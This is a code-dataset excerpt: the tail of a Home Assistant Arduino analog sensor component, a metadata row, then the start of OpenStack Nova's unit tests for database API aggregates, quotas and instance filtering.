from homeassistant.helpers.entity import Entity
from . import DOMAIN
CONF_PINS = "pins"
CONF_TYPE = "analog"
PIN_SCHEMA = vol.Schema({vol.Required(CONF_NAME): cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_PINS): vol.Schema({cv.positive_int: PIN_SCHEMA})}
)
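# An example configuration this schema accepts (illustrative only, not part of
# the original component):
#
#   sensor:
#     - platform: arduino
#       pins:
#         7:
#           name: Analog input 7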
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Arduino platform."""
board = hass.data[DOMAIN]
pins = config[CONF_PINS]
sensors = []
for pinnum, pin in pins.items():
sensors.append(ArduinoSensor(pin.get(CONF_NAME), pinnum, CONF_TYPE, board))
add_entities(sensors)
class ArduinoSensor(Entity):
"""Representation of an Arduino Sensor."""
def __init__(self, name, pin, pin_type, board):
"""Initialize the sensor."""
self._pin = pin
self._name = name
self.pin_type = pin_type
self.direction = "in"
self._value = None
board.set_mode(self._pin, self.direction, self.pin_type)
self._board = board
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def name(self):
"""Get the name of the sensor."""
return self._name
def update(self):
"""Get the latest value from the pin."""
self._value = self._board.get_analog_inputs()[self._pin][1]
| apache-2.0 | -3,335,557,974,952,929,000 | 26.440678 | 83 | 0.652872 | false |
JioCloud/nova_test_latest | nova/tests/unit/db/test_db_api.py | 5 | 388540 | # encoding=UTF8
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the DB API."""
import copy
import datetime
import uuid as stdlib_uuid
import iso8601
import mock
import netaddr
from oslo_config import cfg
from oslo_db import api as oslo_db_api
from oslo_db import exception as db_exc
from oslo_db.sqlalchemy import test_base
from oslo_db.sqlalchemy import utils as sqlalchemyutils
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import range
from sqlalchemy import Column
from sqlalchemy.dialects import sqlite
from sqlalchemy.exc import OperationalError
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy.orm import query
from sqlalchemy import sql
from sqlalchemy import Table
from nova import block_device
from nova.compute import arch
from nova.compute import vm_states
from nova import context
from nova import db
from nova.db.sqlalchemy import api as sqlalchemy_api
from nova.db.sqlalchemy import models
from nova.db.sqlalchemy import types as col_types
from nova.db.sqlalchemy import utils as db_utils
from nova import exception
from nova import objects
from nova import quota
from nova import test
from nova.tests.unit import matchers
from nova import utils
CONF = cfg.CONF
CONF.import_opt('reserved_host_memory_mb', 'nova.compute.resource_tracker')
CONF.import_opt('reserved_host_disk_mb', 'nova.compute.resource_tracker')
get_engine = sqlalchemy_api.get_engine
get_session = sqlalchemy_api.get_session
def _reservation_get(context, uuid):
result = sqlalchemy_api.model_query(context, models.Reservation,
read_deleted="no").filter_by(uuid=uuid).first()
if not result:
raise exception.ReservationNotFound(uuid=uuid)
return result
def _quota_reserve(context, project_id, user_id):
"""Create sample Quota, QuotaUsage and Reservation objects.
There is no method db.quota_usage_create(), so we have to use
db.quota_reserve() for creating QuotaUsage objects.
Returns reservations uuids.
"""
def get_sync(resource, usage):
def sync(elevated, project_id, user_id, session):
return {resource: usage}
return sync
quotas = {}
user_quotas = {}
resources = {}
deltas = {}
for i in range(3):
resource = 'resource%d' % i
if i == 2:
# test for project level resources
resource = 'fixed_ips'
quotas[resource] = db.quota_create(context,
project_id,
resource, i + 2).hard_limit
user_quotas[resource] = quotas[resource]
else:
quotas[resource] = db.quota_create(context,
project_id,
resource, i + 1).hard_limit
user_quotas[resource] = db.quota_create(context, project_id,
resource, i + 1,
user_id=user_id).hard_limit
sync_name = '_sync_%s' % resource
resources[resource] = quota.ReservableResource(
resource, sync_name, 'quota_res_%d' % i)
deltas[resource] = i
setattr(sqlalchemy_api, sync_name, get_sync(resource, i))
sqlalchemy_api.QUOTA_SYNC_FUNCTIONS[sync_name] = getattr(
sqlalchemy_api, sync_name)
return db.quota_reserve(context, resources, quotas, user_quotas, deltas,
timeutils.utcnow(), CONF.until_refresh,
datetime.timedelta(days=1), project_id, user_id)
class DbTestCase(test.TestCase):
def setUp(self):
super(DbTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def create_instance_with_args(self, **kwargs):
args = {'reservation_id': 'a', 'image_ref': 1, 'host': 'host1',
'node': 'node1', 'project_id': self.project_id,
'vm_state': 'fake'}
if 'context' in kwargs:
ctxt = kwargs.pop('context')
args['project_id'] = ctxt.project_id
else:
ctxt = self.context
args.update(kwargs)
return db.instance_create(ctxt, args)
def fake_metadata(self, content):
meta = {}
for i in range(0, 10):
meta["foo%i" % i] = "this is %s item %i" % (content, i)
return meta
def create_metadata_for_instance(self, instance_uuid):
meta = self.fake_metadata('metadata')
db.instance_metadata_update(self.context, instance_uuid, meta, False)
sys_meta = self.fake_metadata('system_metadata')
db.instance_system_metadata_update(self.context, instance_uuid,
sys_meta, False)
return meta, sys_meta
class DecoratorTestCase(test.TestCase):
def _test_decorator_wraps_helper(self, decorator):
def test_func():
"""Test docstring."""
decorated_func = decorator(test_func)
self.assertEqual(test_func.__name__, decorated_func.__name__)
self.assertEqual(test_func.__doc__, decorated_func.__doc__)
self.assertEqual(test_func.__module__, decorated_func.__module__)
def test_require_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_context)
def test_require_admin_context_decorator_wraps_functions_properly(self):
self._test_decorator_wraps_helper(sqlalchemy_api.require_admin_context)
def test_require_deadlock_retry_wraps_functions_properly(self):
self._test_decorator_wraps_helper(
oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True))
def _get_fake_aggr_values():
return {'name': 'fake_aggregate'}
def _get_fake_aggr_metadata():
return {'fake_key1': 'fake_value1',
'fake_key2': 'fake_value2',
'availability_zone': 'fake_avail_zone'}
def _get_fake_aggr_hosts():
return ['foo.openstack.org']
def _create_aggregate(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata()):
return db.aggregate_create(context, values, metadata)
def _create_aggregate_with_hosts(context=context.get_admin_context(),
values=_get_fake_aggr_values(),
metadata=_get_fake_aggr_metadata(),
hosts=_get_fake_aggr_hosts()):
result = _create_aggregate(context=context,
values=values, metadata=metadata)
for host in hosts:
db.aggregate_host_add(context, result['id'], host)
return result
@mock.patch.object(sqlalchemy_api, '_get_regexp_op_for_connection',
return_value='LIKE')
class UnsupportedDbRegexpTestCase(DbTestCase):
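    """Filter tests with the regexp operator forced to LIKE (see the class
    decorator), emulating a database backend without native regexp support.
    """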
def test_instance_get_all_by_filters_paginate(self, mock_get_regexp):
test1 = self.create_instance_with_args(display_name='test1')
test2 = self.create_instance_with_args(display_name='test2')
test3 = self.create_instance_with_args(display_name='test3')
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
marker=None)
self.assertEqual(3, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test1['uuid'])
self.assertEqual(2, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test2['uuid'])
self.assertEqual(1, len(result))
result = db.instance_get_all_by_filters(self.context,
{'display_name': '%test%'},
sort_dir="asc",
marker=test3['uuid'])
self.assertEqual(0, len(result))
self.assertRaises(exception.MarkerNotFound,
db.instance_get_all_by_filters,
self.context, {'display_name': '%test%'},
marker=str(stdlib_uuid.uuid4()))
def _assert_equals_inst_order(self, correct_order, filters,
sort_keys=None, sort_dirs=None,
limit=None, marker=None,
match_keys=['uuid', 'vm_state',
'display_name', 'id']):
'''Retrieves instances based on the given filters and sorting
information and verifies that the instances are returned in the
correct sorted order by ensuring that the supplied keys match.
'''
result = db.instance_get_all_by_filters_sort(
self.context, filters, limit=limit, marker=marker,
sort_keys=sort_keys, sort_dirs=sort_dirs)
self.assertEqual(len(correct_order), len(result))
for inst1, inst2 in zip(result, correct_order):
for key in match_keys:
self.assertEqual(inst1.get(key), inst2.get(key))
return result
def test_instance_get_all_by_filters_sort_keys(self, mock_get_regexp):
'''Verifies sort order and direction for multiple instances.'''
        # Instances that will match the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
        # Other instances in the DB; these will not match the name filter
other_error = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ERROR)
other_active = self.create_instance_with_args(
display_name='other',
vm_state=vm_states.ACTIVE)
filters = {'display_name': '%test%'}
# Verify different sort key/direction combinations
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'desc', 'asc']
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['desc', 'desc', 'asc']
correct_order = [test2_error, test2_error2, test2_active,
test1_error, test1_error2, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# created_at is added by default if not supplied, descending order
sort_keys = ['display_name', 'vm_state']
sort_dirs = ['desc', 'desc']
correct_order = [test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Now created_at should be in ascending order (defaults to the first
# sort dir direction)
sort_dirs = ['asc', 'asc']
correct_order = [test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Remove name filter, get all instances
correct_order = [other_active, other_error,
test1_active, test1_error, test1_error2,
test2_active, test2_error, test2_error2]
self._assert_equals_inst_order(correct_order, {},
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Default sorting, 'created_at' then 'id' in desc order
correct_order = [other_active, other_error,
test2_error2, test2_error, test2_active,
test1_error2, test1_error, test1_active]
self._assert_equals_inst_order(correct_order, {})
def test_instance_get_all_by_filters_sort_keys_paginate(self,
mock_get_regexp):
'''Verifies sort order with pagination.'''
        # Instances that will match the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
        # Other instances in the DB; these will not match the name filter
self.create_instance_with_args(display_name='other')
self.create_instance_with_args(display_name='other')
filters = {'display_name': '%test%'}
# Common sort information for every query
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct instance order based on the sort keys
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
# Limits of 1, 2, and 3, verify that the instances returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of instances (ie, 6) to ensure that
# the last query (with marker pointing to the last instance)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
insts = self._assert_equals_inst_order(
correct, filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = insts[-1]['uuid']
self.assertEqual(correct[-1]['uuid'], marker)
def test_instance_get_deleted_by_filters_sort_keys_paginate(self,
mock_get_regexp):
'''Verifies sort order with pagination for deleted instances.'''
ctxt = context.get_admin_context()
        # Instances that will match the query
test1_active = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ACTIVE)
db.instance_destroy(ctxt, test1_active['uuid'])
test1_error = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test1_error['uuid'])
test1_error2 = self.create_instance_with_args(
display_name='test1',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test1_error2['uuid'])
test2_active = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ACTIVE)
db.instance_destroy(ctxt, test2_active['uuid'])
test2_error = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test2_error['uuid'])
test2_error2 = self.create_instance_with_args(
display_name='test2',
vm_state=vm_states.ERROR)
db.instance_destroy(ctxt, test2_error2['uuid'])
        # Other instances in the DB; these will not match the name filter
self.create_instance_with_args(display_name='other')
self.create_instance_with_args(display_name='other')
filters = {'display_name': '%test%', 'deleted': True}
# Common sort information for every query
sort_keys = ['display_name', 'vm_state', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct instance order based on the sort keys
correct_order = [test1_error, test1_error2, test1_active,
test2_error, test2_error2, test2_active]
# Limits of 1, 2, and 3, verify that the instances returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of instances (ie, 6) to ensure that
# the last query (with marker pointing to the last instance)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
insts = self._assert_equals_inst_order(
correct, filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = insts[-1]['uuid']
self.assertEqual(correct[-1]['uuid'], marker)
class ModelQueryTestCase(DbTestCase):
def test_model_query_invalid_arguments(self):
# read_deleted shouldn't accept invalid values
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted=False)
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted="foo")
# Check model is a valid model
self.assertRaises(TypeError, sqlalchemy_api.model_query,
self.context, "")
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_false(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=False)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_no_slave_connection(self, mock_get_session):
self.flags(slave_connection='', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_true(self, mock_get_session):
self.flags(slave_connection='foo://bar', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=True)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_lazy_session_default(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
session=mock.MagicMock())
self.assertFalse(mock_get_session.called)
class AggregateDBApiTestCase(test.TestCase):
def setUp(self):
super(AggregateDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def test_aggregate_create_no_metadata(self):
result = _create_aggregate(metadata=None)
self.assertEqual(result['name'], 'fake_aggregate')
def test_aggregate_create_avoid_name_conflict(self):
r1 = _create_aggregate(metadata=None)
db.aggregate_delete(context.get_admin_context(), r1['id'])
values = {'name': r1['name']}
metadata = {'availability_zone': 'new_zone'}
r2 = _create_aggregate(values=values, metadata=metadata)
self.assertEqual(r2['name'], values['name'])
self.assertEqual(r2['availability_zone'],
metadata['availability_zone'])
def test_aggregate_create_raise_exist_exc(self):
_create_aggregate(metadata=None)
self.assertRaises(exception.AggregateNameExists,
_create_aggregate, metadata=None)
def test_aggregate_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_get,
ctxt, aggregate_id)
def test_aggregate_metadata_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_metadata_get,
ctxt, aggregate_id)
def test_aggregate_create_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
def test_aggregate_create_delete_create_with_metadata(self):
# test for bug 1052479
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
db.aggregate_delete(ctxt, result['id'])
result = _create_aggregate(metadata={'availability_zone':
'fake_avail_zone'})
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertEqual(expected_metadata, {'availability_zone':
'fake_avail_zone'})
def test_aggregate_get(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt)
expected = db.aggregate_get(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected['hosts'])
self.assertEqual(_get_fake_aggr_metadata(), expected['metadetails'])
def test_aggregate_get_by_host(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
values5 = {'name': 'fake_aggregate5'}
a1 = _create_aggregate_with_hosts(context=ctxt)
a2 = _create_aggregate_with_hosts(context=ctxt, values=values2)
# a3 has no hosts and should not be in the results.
_create_aggregate(context=ctxt, values=values3)
# a4 has no matching hosts.
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'])
# a5 has no matching hosts after deleting the only matching host.
a5 = _create_aggregate_with_hosts(context=ctxt, values=values5,
hosts=['foo5.openstack.org', 'foo.openstack.org'])
db.aggregate_host_delete(ctxt, a5['id'],
'foo.openstack.org')
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual([a1['id'], a2['id']], [x['id'] for x in r1])
def test_aggregate_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
a1 = _create_aggregate_with_hosts(context=ctxt,
metadata={'goodkey': 'good'})
_create_aggregate_with_hosts(context=ctxt, values=values2)
_create_aggregate(context=ctxt, values=values3)
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'], metadata={'goodkey': 'bad'})
# filter result by key
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org', key='goodkey')
self.assertEqual([a1['id']], [x['id'] for x in r1])
def test_aggregate_metadata_get_by_host(self):
ctxt = context.get_admin_context()
values = {'name': 'fake_aggregate2'}
values2 = {'name': 'fake_aggregate3'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=['bar.openstack.org'], metadata={'badkey': 'bad'})
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual(r1['fake_key1'], set(['fake_value1']))
self.assertNotIn('badkey', r1)
def test_aggregate_metadata_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate12'}
values3 = {'name': 'fake_aggregate23'}
a2_hosts = ['foo1.openstack.org', 'foo2.openstack.org']
a2_metadata = {'good': 'value12', 'bad': 'badvalue12'}
a3_hosts = ['foo2.openstack.org', 'foo3.openstack.org']
a3_metadata = {'good': 'value23', 'bad': 'badvalue23'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=a2_hosts, metadata=a2_metadata)
a3 = _create_aggregate_with_hosts(context=ctxt, values=values3,
hosts=a3_hosts, metadata=a3_metadata)
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo2.openstack.org',
key='good')
self.assertEqual(r1['good'], set(['value12', 'value23']))
self.assertNotIn('fake_key1', r1)
self.assertNotIn('bad', r1)
# Delete metadata
db.aggregate_metadata_delete(ctxt, a3['id'], 'good')
r2 = db.aggregate_metadata_get_by_host(ctxt, 'foo3.openstack.org',
key='good')
self.assertNotIn('good', r2)
def test_aggregate_get_by_host_not_found(self):
ctxt = context.get_admin_context()
_create_aggregate_with_hosts(context=ctxt)
self.assertEqual([], db.aggregate_get_by_host(ctxt, 'unknown_host'))
def test_aggregate_delete_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_delete,
ctxt, aggregate_id)
def test_aggregate_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
db.aggregate_delete(ctxt, result['id'])
expected = db.aggregate_get_all(ctxt)
self.assertEqual(0, len(expected))
aggregate = db.aggregate_get(ctxt.elevated(read_deleted='yes'),
result['id'])
self.assertEqual(aggregate['deleted'], result['id'])
def test_aggregate_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
self.assertEqual(result['availability_zone'], 'fake_avail_zone')
new_values = _get_fake_aggr_values()
new_values['availability_zone'] = 'different_avail_zone'
updated = db.aggregate_update(ctxt, result['id'], new_values)
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['availability_zone'] = 'different_avail_zone'
expected_metadata = copy.deepcopy(values['metadata'])
expected_metadata['availability_zone'] = values['availability_zone']
db.aggregate_update(ctxt, result['id'], values)
metadata = db.aggregate_metadata_get(ctxt, result['id'])
updated = db.aggregate_get(ctxt, result['id'])
self.assertThat(metadata,
matchers.DictMatches(expected_metadata))
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['metadata']['fake_key1'] = 'foo'
expected_metadata = copy.deepcopy(values['metadata'])
db.aggregate_update(ctxt, result['id'], values)
metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected_metadata))
def test_aggregate_update_zone_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
new_zone = {'availability_zone': 'fake_avail_zone_2'}
metadata = _get_fake_aggr_metadata()
metadata.update(new_zone)
db.aggregate_update(ctxt, result['id'], new_zone)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_update_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
new_values = _get_fake_aggr_values()
self.assertRaises(exception.AggregateNotFound,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_update_raise_name_exist(self):
ctxt = context.get_admin_context()
_create_aggregate(context=ctxt, values={'name': 'test1'},
metadata={'availability_zone': 'fake_avail_zone'})
_create_aggregate(context=ctxt, values={'name': 'test2'},
metadata={'availability_zone': 'fake_avail_zone'})
aggregate_id = 1
new_values = {'name': 'test2'}
self.assertRaises(exception.AggregateNameExists,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_get_all(self):
ctxt = context.get_admin_context()
counter = 3
for c in range(counter):
_create_aggregate(context=ctxt,
values={'name': 'fake_aggregate_%d' % c},
metadata=None)
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), counter)
def test_aggregate_get_all_non_deleted(self):
ctxt = context.get_admin_context()
add_counter = 5
remove_counter = 2
aggregates = []
for c in range(1, add_counter):
values = {'name': 'fake_aggregate_%d' % c}
aggregates.append(_create_aggregate(context=ctxt,
values=values, metadata=None))
for c in range(1, remove_counter):
db.aggregate_delete(ctxt, aggregates[c - 1]['id'])
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), add_counter - remove_counter)
def test_aggregate_metadata_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_and_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = list(metadata.keys())[0]
new_metadata = {key: 'foo',
'fake_new_key': 'fake_new_value'}
metadata.update(new_metadata)
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_retry(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
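        # Stub the metadata query so that every attempt raises
        # DBDuplicateEntry, which lets us count how many times
        # aggregate_metadata_add retries before giving up.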
def counted():
def get_query(context, id, session, read_deleted):
get_query.counter += 1
raise db_exc.DBDuplicateEntry
get_query.counter = 0
return get_query
get_query = counted()
self.stubs.Set(sqlalchemy_api,
'_aggregate_metadata_get_query', get_query)
self.assertRaises(db_exc.DBDuplicateEntry, sqlalchemy_api.
aggregate_metadata_add, ctxt, result['id'], {},
max_retries=5)
self.assertEqual(get_query.counter, 5)
def test_aggregate_metadata_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = list(metadata.keys())[0]
db.aggregate_metadata_delete(ctxt, result['id'], key)
new_metadata = {key: 'foo'}
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
metadata[key] = 'foo'
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
db.aggregate_metadata_delete(ctxt, result['id'],
list(metadata.keys())[0])
expected = db.aggregate_metadata_get(ctxt, result['id'])
del metadata[list(metadata.keys())[0]]
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_remove_availability_zone(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
db.aggregate_metadata_delete(ctxt, result['id'], 'availability_zone')
expected = db.aggregate_metadata_get(ctxt, result['id'])
aggregate = db.aggregate_get(ctxt, result['id'])
self.assertIsNone(aggregate['availability_zone'])
self.assertThat({}, matchers.DictMatches(expected))
def test_aggregate_metadata_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateMetadataNotFound,
db.aggregate_metadata_delete,
ctxt, result['id'], 'foo_key')
def test_aggregate_host_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected)
def test_aggregate_host_re_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
host = _get_fake_aggr_hosts()[0]
db.aggregate_host_delete(ctxt, result['id'], host)
db.aggregate_host_add(ctxt, result['id'], host)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(len(expected), 1)
def test_aggregate_host_add_duplicate_works(self):
ctxt = context.get_admin_context()
r1 = _create_aggregate_with_hosts(context=ctxt, metadata=None)
r2 = _create_aggregate_with_hosts(ctxt,
values={'name': 'fake_aggregate2'},
metadata={'availability_zone': 'fake_avail_zone2'})
h1 = db.aggregate_host_get_all(ctxt, r1['id'])
h2 = db.aggregate_host_get_all(ctxt, r2['id'])
self.assertEqual(h1, h2)
def test_aggregate_host_add_duplicate_raise_exist_exc(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
self.assertRaises(exception.AggregateHostExists,
db.aggregate_host_add,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
def test_aggregate_host_add_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
host = _get_fake_aggr_hosts()[0]
self.assertRaises(exception.AggregateNotFound,
db.aggregate_host_add,
ctxt, aggregate_id, host)
def test_aggregate_host_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
db.aggregate_host_delete(ctxt, result['id'],
_get_fake_aggr_hosts()[0])
